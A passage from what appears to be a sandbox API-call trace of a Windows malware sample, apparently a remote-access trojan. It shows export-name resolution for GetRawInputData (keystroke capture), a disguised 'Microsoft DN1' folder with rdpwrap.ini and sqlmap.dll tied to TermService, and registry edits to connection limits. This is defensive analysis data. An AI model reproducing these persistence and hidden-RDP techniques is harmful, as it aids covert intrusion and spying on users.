(lpString1="DdeEnableCallback", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeFreeDataHandle", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeFreeStringHandle", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeGetData", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeGetLastError", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeGetQualityOfService", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeImpersonateClient", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeInitializeA", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeInitializeW", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeKeepStringHandle", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeNameService", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DdePostAdvise", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DdeQueryConvInfo", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DdeQueryNextServer", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DdeQueryStringA", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DdeQueryStringW", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DdeReconnect", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DdeSetQualityOfService", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DdeSetUserHandle", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DdeUnaccessData", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DdeUninitialize", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DefDlgProcA", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DefDlgProcW", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DefFrameProcA", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DefFrameProcW", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DefMDIChildProcA", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DefMDIChildProcW", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DefRawInputProc", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DefWindowProcA", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DefWindowProcW", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DeferWindowPos", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DeleteMenu", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DeregisterShellHookWindow", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DestroyAcceleratorTable", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DestroyCaret", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DestroyCursor", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DestroyIcon", lpString2="GetRawInputData") returned -1 [0175.605] lstrcmpA (lpString1="DestroyMenu", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DestroyReasons", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DestroyWindow", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DeviceEventWorker", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DialogBoxIndirectParamA", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DialogBoxIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DialogBoxIndirectParamW", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DialogBoxParamA", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DialogBoxParamW", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DisableProcessWindowsGhosting", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DispatchMessageA", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DispatchMessageW", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DisplayConfigGetDeviceInfo", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DisplayConfigSetDeviceInfo", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DisplayExitWindowsWarnings", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DlgDirListA", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DlgDirListComboBoxA", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DlgDirListComboBoxW", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DlgDirListW", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DlgDirSelectComboBoxExA", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DlgDirSelectComboBoxExW", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DlgDirSelectExA", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DlgDirSelectExW", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DoSoundConnect", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DoSoundDisconnect", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DragDetect", lpString2="GetRawInputData") returned -1 [0175.606] lstrcmpA (lpString1="DragObject", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawAnimatedRects", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawCaption", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawCaptionTempA", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawCaptionTempW", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawEdge", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawFocusRect", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawFrame", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawFrameControl", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawIcon", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawIconEx", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawMenuBar", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawMenuBarTemp", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawStateA", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawStateW", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawTextA", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawTextExA", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawTextExW", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DrawTextW", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DwmGetDxSharedSurface", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DwmStartRedirection", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="DwmStopRedirection", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="EditWndProc", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="EmptyClipboard", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="EnableMenuItem", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="EnableScrollBar", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="EnableWindow", lpString2="GetRawInputData") returned -1 [0175.607] lstrcmpA (lpString1="EndDeferWindowPos", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EndDialog", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EndMenu", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EndPaint", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EndTask", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnterReaderModeHelper", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumChildWindows", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumClipboardFormats", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumDesktopWindows", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumDesktopsA", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumDesktopsW", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumDisplayDevicesA", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumDisplayDevicesW", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumDisplayMonitors", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumDisplaySettingsW", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumPropsA", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumPropsExA", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumPropsExW", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumPropsW", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumThreadWindows", lpString2="GetRawInputData") returned -1 [0175.608] lstrcmpA (lpString1="EnumWindowStationsA", lpString2="GetRawInputData") returned -1 [0175.609] lstrcmpA (lpString1="EnumWindowStationsW", lpString2="GetRawInputData") returned -1 [0175.609] lstrcmpA (lpString1="EnumWindows", lpString2="GetRawInputData") returned -1 [0175.609] lstrcmpA (lpString1="EqualRect", lpString2="GetRawInputData") returned -1 [0175.609] lstrcmpA (lpString1="ExcludeUpdateRgn", lpString2="GetRawInputData") returned -1 [0175.609] lstrcmpA (lpString1="ExitWindowsEx", lpString2="GetRawInputData") returned -1 [0175.609] lstrcmpA (lpString1="FillRect", lpString2="GetRawInputData") returned -1 [0175.609] lstrcmpA (lpString1="FindWindowA", lpString2="GetRawInputData") returned -1 [0175.609] lstrcmpA (lpString1="FindWindowExA", lpString2="GetRawInputData") returned -1 [0175.610] GetProcessHeap () returned 0x620000 [0175.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x647160 [0175.610] lstrlenW (lpString="TermService") returned 11 [0175.610] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.610] lstrlenW (lpString="TermService") returned 11 [0175.610] lstrcpyW (in: lpString1=0x310000, lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0175.611] lstrlenW (lpString="TermService") returned 11 [0175.611] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x320000 [0175.611] lstrcatW (in: lpString1="", lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0175.611] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.611] lstrlenW (lpString="%ProgramFiles%") returned 14 [0175.611] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.612] lstrlenW (lpString="%ProgramFiles%") returned 14 [0175.612] lstrcpyW (in: lpString1=0x310000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0175.612] lstrlenW (lpString="%ProgramFiles%") returned 14 [0175.612] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x330000 [0175.612] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0175.612] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.612] GetCurrentProcess () returned 0xffffffff [0175.612] GetModuleHandleA (lpModuleName="kernel32") returned 0x76210000 [0175.613] GetProcAddress (hModule=0x76210000, lpProcName="IsWow64Process") returned 0x7622195e [0175.613] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2afef4 | out: Wow64Process=0x2afef4) returned 1 [0175.613] VirtualFree (lpAddress=0x330000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.613] lstrlenW (lpString="%ProgramW6432%") returned 14 [0175.613] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.613] lstrlenW (lpString="%ProgramW6432%") returned 14 [0175.613] lstrcpyW (in: lpString1=0x310000, lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0175.613] lstrlenW (lpString="%ProgramW6432%") returned 14 [0175.613] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x330000 [0175.613] lstrcatW (in: lpString1="", lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0175.614] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.614] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x2afb04, nSize=0x1ff | out: lpDst="C:\\Program Files") returned 0x11 [0175.614] lstrlenW (lpString="C:\\Program Files") returned 16 [0175.614] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.614] lstrlenW (lpString="C:\\Program Files") returned 16 [0175.614] lstrcpyW (in: lpString1=0x310000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0175.614] lstrlenW (lpString="C:\\Program Files") returned 16 [0175.614] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x340000 [0175.614] lstrcpyW (in: lpString1=0x340000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0175.614] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.615] VirtualFree (lpAddress=0x330000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.615] lstrlenW (lpString="%ProgramFiles%") returned 14 [0175.615] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.615] lstrlenW (lpString="%ProgramFiles%") returned 14 [0175.615] lstrcpyW (in: lpString1=0x310000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0175.615] lstrlenW (lpString="%ProgramFiles%") returned 14 [0175.615] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x330000 [0175.615] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0175.616] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.616] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0175.616] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.616] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0175.616] lstrcpyW (in: lpString1=0x310000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0175.616] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0175.616] lstrlenW (lpString="C:\\Program Files") returned 16 [0175.616] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x2afea8, dwLength=0x1c | out: lpBuffer=0x2afea8*(BaseAddress=0x340000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.616] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x350000 [0175.617] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.617] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0175.617] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.617] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0175.617] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.617] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0175.617] lstrcpyW (in: lpString1=0x310000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0175.617] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0175.617] lstrlenW (lpString="%ProgramFiles%") returned 14 [0175.617] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x2afea8, dwLength=0x1c | out: lpBuffer=0x2afea8*(BaseAddress=0x330000, AllocationBase=0x330000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.617] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0x340000 [0175.618] VirtualFree (lpAddress=0x330000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.618] lstrcatW (in: lpString1="%ProgramFiles%", lpString2="\\Microsoft DN1" | out: lpString1="%ProgramFiles%\\Microsoft DN1") returned="%ProgramFiles%\\Microsoft DN1" [0175.618] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.618] SHCreateDirectoryExW (hwnd=0x0, pszPath="C:\\Program Files\\Microsoft DN1" (normalized: "c:\\program files\\microsoft dn1"), psa=0x0) returned 183 [0175.619] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0175.619] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.619] lstrcpyW (in: lpString1=0x310000, lpString2="C:\\Program Files\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0175.619] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0175.619] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x330000 [0175.619] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0175.619] lstrcpyW (in: lpString1=0x330000, lpString2="\\rdpwrap.ini" | out: lpString1="\\rdpwrap.ini") returned="\\rdpwrap.ini" [0175.619] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0175.619] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0175.619] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x2afea8, dwLength=0x1c | out: lpBuffer=0x2afea8*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.619] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x360000 [0175.620] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.620] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\rdpwrap.ini" | out: lpString1="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini" [0175.620] VirtualFree (lpAddress=0x330000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.620] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0175.620] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.621] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0175.621] lstrcpyW (in: lpString1=0x310000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0175.621] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0175.621] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0175.621] VirtualQuery (in: lpAddress=0x350000, lpBuffer=0x2afea8, dwLength=0x1c | out: lpBuffer=0x2afea8*(BaseAddress=0x350000, AllocationBase=0x350000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.621] VirtualAlloc (lpAddress=0x0, dwSize=0x56, flAllocationType=0x3000, flProtect=0x4) returned 0x330000 [0175.621] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.621] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned="C:\\Program Files\\Microsoft DN1\\sqlmap.dll" [0175.621] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.622] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0175.622] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.622] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0175.622] lstrcpyW (in: lpString1=0x310000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0175.622] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0175.622] lstrlenW (lpString="%ProgramFiles%\\Microsoft DN1") returned 28 [0175.622] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x2afea8, dwLength=0x1c | out: lpBuffer=0x2afea8*(BaseAddress=0x340000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.622] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x350000 [0175.622] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.622] lstrcatW (in: lpString1="%ProgramFiles%\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll") returned="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll" [0175.623] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.653] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.653] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x19c [0175.653] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x54cb9c | out: lpWSAData=0x54cb9c) returned 0 [0175.660] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x340000 [0175.661] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1b4 [0175.661] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x54cd7c | out: lpWSAData=0x54cd7c) returned 0 [0175.661] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1b8 [0175.661] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0175.661] GetTickCount () returned 0x113a7f3 [0175.661] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2af9d0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0175.661] GetProcessHeap () returned 0x620000 [0175.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x400000) returned 0x2840020 [0175.662] CreateFileA (lpFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0175.663] GetFileSize (in: hFile=0x1bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb7400 [0175.663] ReadFile (in: hFile=0x1bc, lpBuffer=0x2840020, nNumberOfBytesToRead=0xb7400, lpNumberOfBytesRead=0x2af8c4, lpOverlapped=0x0 | out: lpBuffer=0x2840020*, lpNumberOfBytesRead=0x2af8c4*=0xb7400, lpOverlapped=0x0) returned 1 [0175.676] CloseHandle (hObject=0x1bc) returned 1 [0175.677] GetProcessHeap () returned 0x620000 [0175.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6542f8 [0175.677] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="\x07©\x97U") returned 0x1bc [0175.677] GetLastError () returned 0x0 [0175.677] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x2af8e0, lpdwDisposition=0x2af8f4 | out: phkResult=0x2af8e0*=0x1c0, lpdwDisposition=0x2af8f4*=0x2) returned 0x0 [0175.677] RegSetValueExA (in: hKey=0x1c0, lpValueName="MaxConnectionsPer1_0Server", Reserved=0x0, dwType=0x4, lpData=0x2af8ec*=0xa, cbData=0x4 | out: lpData=0x2af8ec*=0xa) returned 0x0 [0175.678] RegSetValueExA (in: hKey=0x1c0, lpValueName="MaxConnectionsPerServer", Reserved=0x0, dwType=0x4, lpData=0x2af8ec*=0xa, cbData=0x4 | out: lpData=0x2af8ec*=0xa) returned 0x0 [0175.678] RegCloseKey (hKey=0x1c0) returned 0x0 [0175.678] Sleep (dwMilliseconds=0x1f4) [0176.236] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1c0 [0176.236] GetProcessHeap () returned 0x620000 [0176.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf4) returned 0x64d528 [0176.246] GetProcessHeap () returned 0x620000 [0176.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x400) returned 0x64d628 [0176.246] GetProcessHeap () returned 0x620000 [0176.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11c00) returned 0x65afe8 [0176.248] GetProcessHeap () returned 0x620000 [0176.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11c00) returned 0x66cbf0 [0176.250] GetProcessHeap () returned 0x620000 [0176.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x65afe8 | out: hHeap=0x620000) returned 1 [0176.250] GetProcessHeap () returned 0x620000 [0176.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a00) returned 0x64da30 [0176.250] GetProcessHeap () returned 0x620000 [0176.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a00) returned 0x65afe8 [0176.251] GetProcessHeap () returned 0x620000 [0176.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64da30 | out: hHeap=0x620000) returned 1 [0176.251] GetProcessHeap () returned 0x620000 [0176.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x600) returned 0x67e7f8 [0176.251] GetProcessHeap () returned 0x620000 [0176.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x600) returned 0x64da30 [0176.252] GetProcessHeap () returned 0x620000 [0176.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67e7f8 | out: hHeap=0x620000) returned 1 [0176.252] GetProcessHeap () returned 0x620000 [0176.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2e00) returned 0x64e038 [0176.252] GetProcessHeap () returned 0x620000 [0176.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2e00) returned 0x65f9f0 [0176.253] GetProcessHeap () returned 0x620000 [0176.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e038 | out: hHeap=0x620000) returned 1 [0176.253] GetProcessHeap () returned 0x620000 [0176.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x64e038 [0176.253] GetProcessHeap () returned 0x620000 [0176.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x64f040 [0176.253] GetProcessHeap () returned 0x620000 [0176.253] 